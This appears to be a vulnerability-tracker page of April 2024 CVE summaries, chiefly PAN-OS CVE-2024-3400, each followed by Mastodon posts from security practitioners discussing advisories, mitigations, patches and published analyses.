Full details of the issue and the latest security advisory updates are available at https://security.paloaltonetworks.com/CVE-2024-3400. We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.

Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties.

For indicators of compromise, please see the Unit 42 Threat Brief and Volexity blog post.

##

catc0n at 2024-04-16T19:31:33.379Z ##

Full Rapid7 technical analysis of Palo Alto Networks via @stephenfewer and new vuln research teammate @fuzz 🤩 Spoiler: Two vulns, one exploit! attackerkb.com/topics/SSTk336T

##

Walker@infosec.exchange at 2024-04-23T01:38:04.000Z ##

I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400

It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.

#cyberchef #Panos #cve20243400

##

wall_e at 2024-04-17T10:07:07.796Z ##

Freshly updated list of very, very expensive toilet paper providers:
paloaltonetworks.com/legal-not

-2024-3400

##

H3liumb0y@infosec.exchange at 2024-04-17T07:55:21.000Z ##

Urgent: Product and Mitigation Guidance Updates for CVE-2024-3400

Palo Alto Networks has released urgent updates to product and mitigation guidance in the CVE-2024-3400 security advisory. Device telemetry does not need to be enabled on firewalls running an affected version of PAN-OS with GlobalProtect portal or GlobalProtect gateway enabled to be exposed to attacks related to this vulnerability.

Full details of the issue and the latest security advisory updates are available at https://security.paloaltonetworks.com/CVE-2024-3400. We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.

Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties.

For indicators of compromise, please see the Unit 42 Threat Brief and Volexity blog post.

#PAN #paloaltonetworks #paloalto #CVE20243400

##

jos1264@social.skynetcloud.site at 2024-04-30T13:25:05.000Z ##

Palo Alto firewalls: CVE-2024-3400 exploitation and PoCs for persistence after resets/upgrades helpnetsecurity.com/2024/04/30 #PaloAltoNetworks #Don'tmiss #Hotstuff #firewall #exploit #News #PoC

##

catc0n at 2024-04-26T21:29:01.741Z ##

Good haul this week, including modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

bontchev at 2024-04-25T09:49:53.934Z ##

Another script for check or exploiting the CVE-2024-3400 (PAN-OS) vulnerability:

exploitalert.com/view-details/

##

apicultor@hachyderm.io at 2024-04-24T21:06:29.000Z ##

@arstechnica >Perimeter devices ought to prevent network hacks. Why are so many devices allowing attacks?

Because of shitty engineering and nobody giving a fuck about doing things right.

It just isn't more exciting than that. Sorry.

A great recent example is the shoddy Python in Palo Alto devices (CVE-2024-3400), and of course being run as root because why not:
labs.watchtowr.com/palo-alto-p

##

jbhall56 at 2024-04-23T12:02:41.999Z ##

Siemens revealed that its Ruggedcom APE1808 devices configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400. securityweek.com/siemens-indus

##

jbhall56 at 2024-04-22T12:36:32.414Z ##

The issue, tracked as CVE-2024-3400 (CVSS score of 10/10), is described as a command injection in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks’ appliances. securityweek.com/thousands-of-

##

oversecurity@mastodon.social at 2024-04-19T15:40:06.000Z ##

22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks

Approximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection...

🔗️ [Bleepingcomputer] link.is.it/8l87v1

##

chrismerkel at 2024-04-19T13:41:57.930Z ##

Dear Palo Alto:

Karma's a bitch.

Sincerely,
CVE-2024-3400

##

jonny@neuromatch.social at 2024-04-19T04:41:09.000Z ##

You shouldnt name your thing PAN-OS because then people have to read the phrase "PAN-OS vulnerability" and now the only thing people know about your thing is that its vulnerable and the name is annoying
security.paloaltonetworks.com/

##

defender at 2024-04-18T12:22:02.984Z ##

Palo Firewall CVE Critical 10 best write up
volexity.com/blog/2024/04/12/z

##

catc0n@infosec.exchange at 2024-04-26T21:29:01.000Z ##

Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 rapid7.com/blog/post/2024/04/2

##

bontchev@infosec.exchange at 2024-04-25T09:49:53.000Z ##

Another script for check or exploiting the CVE-2024-3400 (PAN-OS) vulnerability:

exploitalert.com/view-details/

##

apicultor@hachyderm.io at 2024-04-24T21:06:29.000Z ##

@arstechnica >Perimeter devices ought to prevent network hacks. Why are so many devices allowing attacks?

Because of shitty engineering and nobody giving a fuck about doing things right.

It just isn't more exciting than that. Sorry.

A great recent example is the shoddy Python in Palo Alto devices (CVE-2024-3400), and of course being run as root because why not:
labs.watchtowr.com/palo-alto-p

##

jbhall56@infosec.exchange at 2024-04-23T12:02:41.000Z ##

Siemens revealed that its Ruggedcom APE1808 devices configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400. securityweek.com/siemens-indus

##

jbhall56@infosec.exchange at 2024-04-22T12:36:32.000Z ##

The issue, tracked as CVE-2024-3400 (CVSS score of 10/10), is described as a command injection in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks’ appliances. securityweek.com/thousands-of-

##

oversecurity@mastodon.social at 2024-04-19T15:40:06.000Z ##

22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks

Approximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection...

🔗️ [Bleepingcomputer] link.is.it/8l87v1

##

chrismerkel@infosec.exchange at 2024-04-19T13:41:57.000Z ##

Dear Palo Alto:

Karma's a bitch.

Sincerely,
CVE-2024-3400

##

jonny@neuromatch.social at 2024-04-19T04:41:09.000Z ##

You shouldnt name your thing PAN-OS because then people have to read the phrase "PAN-OS vulnerability" and now the only thing people know about your thing is that its vulnerable and the name is annoying
security.paloaltonetworks.com/

##

pentesttools@infosec.exchange at 2024-04-18T10:38:11.000Z ##

📣 PSA for all ethical hackers: we've integrated detection for CVE-2024-3400, the OS Command Injection in Palo Alto GlobalProtect into our Network Vulnerability Scanner: pentest-tools.com/vulnerabilit

With a CVSSv3 score of 10 and a strong warning from the Cybersecurity and Infrastructure Security Agency (CISA), this vulnerability opens up vulnerable targets to remote unauthenticated attacks.

The bad actor can exploit this CVE fully compromise the server and steal confidential information, install ransomware, or pivot to the internal network.

Our Network Vulnerability Scanner provides detection for CVE-2024-3400 through our Nuclei integration, which reminds us why it's essential that we work together to tackle security issues which impact widely used infrastructure.

Stay safe (and sane), fellow hackers!

👉 Learn about CVE-2024-3400: pentest-tools.com/vulnerabilit
👉 Discover the 4 engines in our Network Scanner: youtube.com/watch?v=s8nsxDz8Ll
👉 Find out what our Network Scanner can do: pentest-tools.com/network-vuln

##

campuscodi@mastodon.social at 2024-04-17T22:15:59.000Z ##

After security researchers posted proof-of-concept code for a recent zero-day in Palo Alto Networks GlobalProtect firewalls, the company says it's seeing "an increasing number of attacks" targeting its devices.

security.paloaltonetworks.com/

##

jerry@infosec.exchange at 2024-04-17T16:44:47.000Z ##

FYI to all you clever Palo people who disabled telemetry to mitigate CVE-2024-3400:

In earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device telemetry is no longer an effective mitigation. Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability.

security.paloaltonetworks.com/

##

filippo@abyssdomain.expert at 2024-04-17T16:24:11.000Z ##

@moloch @hdm @alizthehax0r you know, I am not too convinced this is even in gorilla/sessions.FilesystemStore?

labs.watchtowr.com/palo-alto-p has it in a thing called SessDiskStore which calls paloaltonetworks_com_libs_common_Warn. Maybe they copy-pasted the unsafe code?

gorilla/sessions actually uses github.com/gorilla/securecookie to store the session ID in the cookie, not a plain SESSID.

##

ntkramer@infosec.exchange at 2024-04-17T13:45:35.000Z ##

☕️ & #threatintel: as expected, Palo Alto's PAN-OS CVE-2024-3400 exploitation has transitioned to widespread and opportunistic.

Be sure to keep up with PA's advisory as it was updated on the last day.

viz.greynoise.io/tags/palo-alt

##

jbhall56@infosec.exchange at 2024-04-17T12:30:31.000Z ##

Tracked as CVE-2024-3400, this security flaw can let unauthenticated threat actors execute arbitrary code as root via command injection in low-complexity attacks on vulnerable PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls if the device telemetry and GlobalProtect (gateway or portal) feature are enabled. bleepingcomputer.com/news/secu

##

decio@infosec.exchange at 2024-04-17T08:05:31.000Z ##

à propos des analyses de la vuln CVE-2024-3400 , j'aime bien l'image d'en-tête de celle de watchtowr.
:)
ça résume bien la situation actuelle de ces appliances de "protection" en ligne de front

labs.watchtowr.com/palo-alto-p

##

hdm@infosec.exchange at 2024-04-17T02:36:19.000Z ##

The watchTowr folks published an in-depth article today covering the Palo Alto Networks unauthenticated RCE at: labs.watchtowr.com/palo-alto-p

Even more impressive is they also disclosed a zero-day directory traversal vulnerability in the #golang gorilla/sessions package (used far and wide). The gorilla vulnerability only applies to code using the FilesystemStore, but it is still likely to impact a huge range of products and services. A pull request to fix this is open at github.com/gorilla/sessions/pu

Huge thanks to @alizthehax0r and the watchTowr team as well as @moloch of Bishop Fox for co-discovery (and providing a fix for) of the gorilla/sessions bug.

##

simontsui@infosec.exchange at 2024-04-17T01:48:10.000Z ##

In case you missed it, Palo Alto Networks updated their security advisory in terms of product and mitigation guidance, exploit status, and PAN-OS fix availability: 🔗 security.paloaltonetworks.com/

  • Exploitation status: Proof of concepts for this vulnerability have been publicly disclosed by third parties.
  • Workarounds and mitigations: In earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device telemetry is no longer an effective mitigation. Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability.
  • Solution:
    • - 10.2.6-h3 (Released 4/16/24)
    • - 11.0.3-h10 (Released 4/16/24)
    • - 11.0.2-h4 (Released 4/16/24)
    • - 11.1.0-h3 (Released 4/16/24)

#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept

##

chort@infosec.exchange at 2024-04-16T21:57:37.000Z ##

Ahhhhhhhhh, I think this is it. Looks like it probably was a vuln in Gorilla/sessions, but the commit didn't flag it as a security change (actually bundled a lot of changes together).

So July, 2023 the code was updated to sanitize file path before opening (when trying to open a file matching the name of what was sent in the cookie).

I wonder how many other places are using Gorilla/sessions and didn't realize this was a security fix, so they haven't updated and are thus vulnerable.

Granted, it seems like the only impact would be ability to write a zero-byte file to arbitrary place on the filesystem (that the process has access to), but as we have seen with CVE-2024-3400 that is can be useful.

##

h4sh@infosec.exchange at 2024-04-16T21:08:41.000Z ##

According to this greynoise tag its already started viz.greynoise.io/tags/palo-alt

##

h4sh@infosec.exchange at 2024-04-16T21:06:53.000Z ##

@watchtowrcyber did it again! #paloalto CVE-2024-3400 now has a very good technical writeup, and will soon be exploited in the wild. this is a valid POC.

labs.watchtowr.com/palo-alto-p

##

CVE-2024-3832(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-04-23T18:30:39

2 posts

Object corruption in V8 in Google Chrome prior to 124.0.6367.60 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-3838
(5.5 MEDIUM)

EPSS: 0.05%

updated 2024-04-23T18:30:39

2 posts

Inappropriate implementation in Autofill in Google Chrome prior to 124.0.6367.60 allowed an attacker who convinced a user to install a malicious app to perform UI spoofing via a crafted app. (Chromium security severity: Medium)

screaminggoat at 2024-04-18T19:26:07.484Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

##

simontsui@infosec.exchange at 2024-04-18T19:26:07.000Z ##

Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.

  1. CVE-2024-3832 Chromium: CVE-2024-3832 Object corruption in V8
  2. CVE-2024-3833 Chromium: CVE-2024-3833 Object corruption in WebAssembly
  3. CVE-2024-3914 Chromium: CVE-2024-3914 Use after free in V8
  4. CVE-2024-3834 Chromium: CVE-2024-3834 Use after free in Downloads
  5. CVE-2024-3837 Chromium: CVE-2024-3837 Use after free in QUIC
  6. CVE-2024-3838 Chromium: CVE-2024-3838 Inappropriate implementation in Autofill
  7. CVE-2024-3839 Chromium: CVE-2024-3839 Out of bounds read in Fonts
  8. CVE-2024-3840 Chromium: CVE-2024-3840 Insufficient policy enforcement in Site Isolation
  9. CVE-2024-3841 Chromium: CVE-2024-3841 Insufficient data validation in Browser Switcher
  10. CVE-2024-3843 Chromium: CVE-2024-3843 Insufficient data validation in Downloads
  11. CVE-2024-3844 Chromium: CVE-2024-3844 Inappropriate implementation in Extensions
  12. CVE-2024-3845 Chromium: CVE-2024-3845 Inappropriate implementation in Network
  13. CVE-2024-3846 Chromium: CVE-2024-3846 Inappropriate implementation in Prompts
  14. CVE-2024-3847 Chromium: CVE-2024-3847 Insufficient policy enforcement in WebUI

#Microsoft #Chromium #Chrome #vulnerability

##

CVE-2024-29003
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-23T15:30:35

1 posts

The SolarWinds Platform was susceptible to a XSS vulnerability that affects the maps section of the user interface. This vulnerability requires authentication and requires user interaction.

screaminggoat at 2024-04-23T11:30:23.931Z ##

Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:

  • CVE-2024-28073 (8.4 high) SolarWinds Serv-U Directory Traversal Remote Code Execution Vulnerability
  • CVE-2024-29001 (7.5 high) SolarWinds Platform SWQL Injection Vulnerability
  • CVE-2024-29003 (7.5 high) SolarWinds Platform Cross Site Scripting Vulnerability

##

CVE-2024-1480
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-20T00:31:58

8 posts

Unitronics Vision Standard line of controllers allow the Information Mode password to be retrieved without authentication.

screaminggoat at 2024-04-30T15:38:17.955Z ##

CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:

  1. Change the default 1111 "Info Mode" password via SI 253
  2. Restrict Ethernet access to the PLC having an Ethernet card using:
    1. Implementing PLC multi-factor access using SB 314.
    2. Apply a multi-factor VPN to protect the service from remote access.

cc: @reverseics

##

screaminggoat at 2024-04-18T18:07:22.192Z ##

CISA Industrial Control System security advisory includes a familiar product: Unitronics Vision Standard PLCs allow a remote, unauthenticated individual to retrieve the 'Information Mode' password in plaintext. This vulnerability is tracked as CVE-2024-1480 (7.5 high) and was reported by @reverseics of Dragos. 🔗 cisa.gov/news-events/ics-advis

Unitronics has not responded to requests to work with CISA to mitigate this vulnerability.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

##

screaminggoat@infosec.exchange at 2024-04-30T15:38:17.000Z ##

CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:

  1. Change the default 1111 "Info Mode" password via SI 253
  2. Restrict Ethernet access to the PLC having an Ethernet card using:
    1. Implementing PLC multi-factor access using SB 314.
    2. Apply a multi-factor VPN to protect the service from remote access.

cc: @reverseics

#Unitronics #PLC #ICS #CVE_2024_1480

##

simontsui@infosec.exchange at 2024-04-18T18:07:22.000Z ##

CISA Industrial Control System security advisory includes a familiar product: Unitronics Vision Standard PLCs allow a remote, unauthenticated individual to retrieve the 'Information Mode' password in plaintext. This vulnerability is tracked as CVE-2024-1480 (7.5 high) and was reported by @reverseics of Dragos. 🔗 cisa.gov/news-events/ics-advis

Unitronics has not responded to requests to work with CISA to mitigate this vulnerability.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

#Unitronics #CVE_2024_1480 #PLC

##

screaminggoat at 2024-04-30T15:38:17.955Z ##

CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:

  1. Change the default 1111 "Info Mode" password via SI 253
  2. Restrict Ethernet access to the PLC having an Ethernet card using:
    1. Implementing PLC multi-factor access using SB 314.
    2. Apply a multi-factor VPN to protect the service from remote access.

cc: @reverseics

##

screaminggoat at 2024-04-18T18:07:22.192Z ##

CISA Industrial Control System security advisory includes a familiar product: Unitronics Vision Standard PLCs allow a remote, unauthenticated individual to retrieve the 'Information Mode' password in plaintext. This vulnerability is tracked as CVE-2024-1480 (7.5 high) and was reported by @reverseics of Dragos. 🔗 cisa.gov/news-events/ics-advis

Unitronics has not responded to requests to work with CISA to mitigate this vulnerability.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

##

screaminggoat@infosec.exchange at 2024-04-30T15:38:17.000Z ##

CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:

  1. Change the default 1111 "Info Mode" password via SI 253
  2. Restrict Ethernet access to the PLC having an Ethernet card using:
    1. Implementing PLC multi-factor access using SB 314.
    2. Apply a multi-factor VPN to protect the service from remote access.

cc: @reverseics

#Unitronics #PLC #ICS #CVE_2024_1480

##

simontsui@infosec.exchange at 2024-04-18T18:07:22.000Z ##

CISA Industrial Control System security advisory includes a familiar product: Unitronics Vision Standard PLCs allow a remote, unauthenticated individual to retrieve the 'Information Mode' password in plaintext. This vulnerability is tracked as CVE-2024-1480 (7.5 high) and was reported by @reverseics of Dragos. 🔗 cisa.gov/news-events/ics-advis

Unitronics has not responded to requests to work with CISA to mitigate this vulnerability.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.

#Unitronics #CVE_2024_1480 #PLC

##

CVE-2024-29991
(5.0 MEDIUM)

EPSS: 0.06%

updated 2024-04-19T18:31:16

4 posts

Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

screaminggoat at 2024-04-19T16:59:50.165Z ##

New Microsoft Security Response Center (MSRC) security advisory for Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability CVE-2024-29991 (5.0 medium). A lot of information is revealed: attack complexity=high, and MSRC says that it would need to be used in an exploit chain for an attack. An attacker must send the user a malicious file and convince them to open it. 🔗 msrc.microsoft.com/update-guid

##

RichBartlett at 2024-04-19T07:54:04.399Z ##

A very normal morning in the world of Microsoft security.
1. Microsoft Defender Vulnerability Management tells me there's a new CVE for Edge.
2. It says 'score Unknown', the description is "This vulnerability affects the following vendors: Microsoft. To view more details about this vulnerability please visit the vendor website".
3. Search for CVE-2024-29991, search result includes msrc.microsoft.com/update-guid, visit page, 404 page not found.
This is all fine.

##

simontsui@infosec.exchange at 2024-04-19T16:59:50.000Z ##

New Microsoft Security Response Center (MSRC) security advisory for Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability CVE-2024-29991 (5.0 medium). A lot of information is revealed: attack complexity=high, and MSRC says that it would need to be used in an exploit chain for an attack. An attacker must send the user a malicious file and convince them to open it. 🔗 msrc.microsoft.com/update-guid

#CVE_2024_29991 #MSRC #Microsoft #vulnerability #Chrome

##

RichBartlett@infosec.exchange at 2024-04-19T07:54:04.000Z ##

A very normal morning in the world of Microsoft security.
1. Microsoft Defender Vulnerability Management tells me there's a new CVE for Edge.
2. It says 'score Unknown', the description is "This vulnerability affects the following vendors: Microsoft. To view more details about this vulnerability please visit the vendor website".
3. Search for CVE-2024-29991, search result includes msrc.microsoft.com/update-guid, visit page, 404 page not found.
This is all fine.

##

CVE-2024-29204
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-04-19T13:10:25.637000

5 posts

A Heap Overflow vulnerability in WLAvalancheService component of Ivanti Avalanche before 6.4.3 allows a remote unauthenticated attacker to execute arbitrary commands

screaminggoat at 2024-04-19T16:26:21.786Z ##

Tenable has published additional details about CVE-2024-29204 (9.8 critical, disclosed 16 April 2024 by Ivanti) and how it can be exploited by sending messages to Avalanche’s WLAvalancheService.exe on TCP port 1777. This includes a Proof of Concept. 🔗 tenable.com/security/research/

##

adulau at 2024-04-19T03:35:41.907Z ##

I bet is compliant to ISO9001 which is delivering a constant stream of high quality vulnerabilities. One is an unauthenticated RCE and another one is a DoS where you can delete remote files.

vulnerability.circl.lu/vuln/CV

vulnerability.circl.lu/cve/CVE

##

jos1264@social.skynetcloud.site at 2024-04-18T12:10:05.000Z ##

Ivanti patches critical Avalanche flaw exploitable via a simple message (CVE-2024-29204) helpnetsecurity.com/2024/04/18 #remotemanagement #vulnerability #Don'tmiss #Hotstuff #Tenable #Ivanti #News #CVE

##

simontsui@infosec.exchange at 2024-04-19T16:26:21.000Z ##

Tenable has published additional details about CVE-2024-29204 (9.8 critical, disclosed 16 April 2024 by Ivanti) and how it can be exploited by sending messages to Avalanche’s WLAvalancheService.exe on TCP port 1777. This includes a Proof of Concept. 🔗 tenable.com/security/research/

#CVE_2024_29204 #Ivanti #Avalanche #proofofconcept #poc

##

adulau@infosec.exchange at 2024-04-19T03:35:41.000Z ##

I bet #Ivanti is compliant to ISO9001 which is delivering a constant stream of high quality vulnerabilities. One is an unauthenticated RCE and another one is a DoS where you can delete remote files.

vulnerability.circl.lu/vuln/CV

vulnerability.circl.lu/cve/CVE

#vulnerability #infosec #ivanti

##

CVE-2024-27984
(7.1 HIGH)

EPSS: 0.07%

updated 2024-04-19T13:10:25.637000

2 posts

A Path Traversal vulnerability in web component of Ivanti Avalanche before 6.4.3 allows a remote authenticated attacker to delete specific type of files and/or cause denial of service.

adulau at 2024-04-19T03:35:41.907Z ##

I bet is compliant to ISO9001 which is delivering a constant stream of high quality vulnerabilities. One is an unauthenticated RCE and another one is a DoS where you can delete remote files.

vulnerability.circl.lu/vuln/CV

vulnerability.circl.lu/cve/CVE

##

adulau@infosec.exchange at 2024-04-19T03:35:41.000Z ##

I bet #Ivanti is compliant to ISO9001 which is delivering a constant stream of high quality vulnerabilities. One is an unauthenticated RCE and another one is a DoS where you can delete remote files.

vulnerability.circl.lu/vuln/CV

vulnerability.circl.lu/cve/CVE

#vulnerability #infosec #ivanti

##

CVE-2024-28185
(10.0 CRITICAL)

EPSS: 0.04%

updated 2024-04-18T18:25:55.267000

2 posts

Judge0 is an open-source online code execution system. The application does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox. When executing a submission, Judge0 writes a `run_script` to the sandbox directory. The security issue is that an attacker can create a symbolic lin

screaminggoat at 2024-04-29T13:52:07.868Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

##

screaminggoat@infosec.exchange at 2024-04-29T13:52:07.000Z ##

Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator

  • CVE-2024-29021 (9.0 critical) Server Side Request Forgery (SSRF) leads to sandbox escape, an attacker with sufficient access to the Judge0 API obtains unsandboxed code execution as root on the target machine.
  • CVE-2024-28185 (10.0 critical) Symlinks placed inside the sandbox directory can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.
  • CVE-2024-28189 (10.0 critical) Symlink to a file outside the sandbox allows an attacker to run chown on arbitrary files outside of the sandbox. Considered CVE-2024-28185 patch bypass.

#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability

##

CVE-2024-29001
(7.5 HIGH)

EPSS: 0.04%

updated 2024-04-18T09:30:53

1 posts

A SolarWinds Platform SWQL Injection Vulnerability was identified in the user interface. This vulnerability requires authentication and user interaction to be exploited.

screaminggoat at 2024-04-23T11:30:23.931Z ##

Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:

  • CVE-2024-28073 (8.4 high) SolarWinds Serv-U Directory Traversal Remote Code Execution Vulnerability
  • CVE-2024-29001 (7.5 high) SolarWinds Platform SWQL Injection Vulnerability
  • CVE-2024-29003 (7.5 high) SolarWinds Platform Cross Site Scripting Vulnerability

##

CVE-2024-28073
(8.5 HIGH)

EPSS: 0.04%

updated 2024-04-17T18:31:37

1 posts

